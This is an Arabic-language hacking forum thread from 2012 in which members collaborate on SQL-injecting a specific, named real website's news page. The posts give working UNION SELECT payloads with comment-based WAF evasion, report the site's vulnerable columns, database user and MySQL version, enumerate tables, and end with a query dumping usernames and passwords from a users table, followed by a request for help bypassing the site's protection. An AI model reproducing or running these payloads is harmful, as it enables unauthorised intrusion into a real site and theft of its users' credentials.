يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة about SQL injection
التسجيل التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-10-2012, 07:21 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 
 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road
سؤال مجاب: about SQL injection

http://hopelutherancranberry.org/readnews.php?id=199


هذا الموقع فيه فلترة كبيره تجاوزت البعض و فشلت في البعض
حاولت بكل الشرحات و ما فيها اي حل
هاي الخطوات الي تفاديتها :
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!group_concat*/(table_name),5,6,7 from information_schema.tables-- - 
لما بجي انفذ امر استعلام الجداول يعطيني فوردبيدن
و لما استخدم دا الامر :
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7 from information_schema.columns-- - 
الاستعلام مافيه فوربيدن و لكن ما يخرج لي اي معلومات و الله غريب
شو النتيجه :
كود:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/hope/public_html/readnews.php on line 78
كانه خطا في الاستعلام، و انا اضنه ذا الاستعلام صحيح 100%
لا فيه احد الطلاب هنا محترف حقن يفيدنا و اجركم على الله

سلام عليكم


Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC about SQL injection

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
أفضل جواب - كتبه aircrack -ng
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,4,5,6,7-- - 
الاعمده المصابه 4 و6

اصدار القاعده 5
hope_hope@localhost : hope_hope : 5.0.95-community

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- - 
الجداول

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,table_name,5,6,7+from+information_schema. tables-- - 
الحقنه
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),name,pass),5,6,7++from+thyme_Users-- - 
قديم 03-11-2012, 01:18 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 
 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road
افتراضي رد: about SQL injection

ياه و لا واحد ............

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
قديم 03-13-2012, 03:01 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
Dr.Unkn0wn
.:: لا إله إلا الله محمد رسول الله ::.
 
الصورة الرمزية Dr.Unkn0wn
 

 
 
إحصائية العضو






Dr.Unkn0wn غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Unkn0wn is on a distinguished road
افتراضي رد: about SQL injection

Try This

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199/*!UNION%20SELECT*/%201,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7%20from%20information_schema.columns-- 

   

رد مع اقتباس
قديم 03-13-2012, 06:22 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 
 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road
افتراضي رد: about SQL injection

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,4,5,6,7-- - 
الاعمده المصابه 4 و6

اصدار القاعده 5
hope_hope@localhost : hope_hope : 5.0.95-community

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- - 
الجداول

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,table_name,5,6,7+from+information_schema. tables-- - 
الحقنه
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),name,pass),5,6,7++from+thyme_Users-- - 
التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

التعديل الأخير تم بواسطة aircrack -ng ; 03-13-2012 الساعة 06:30 PM.

   

رد مع اقتباس
قديم 03-18-2012, 02:26 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 
 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road
افتراضي رد: about SQL injection

Thank's aircrack-ng
بس يا ليت شرح لكيفيه تخطي حماية ذاك الموقع
و بارك الله فيك يا غلا

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 06:00 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0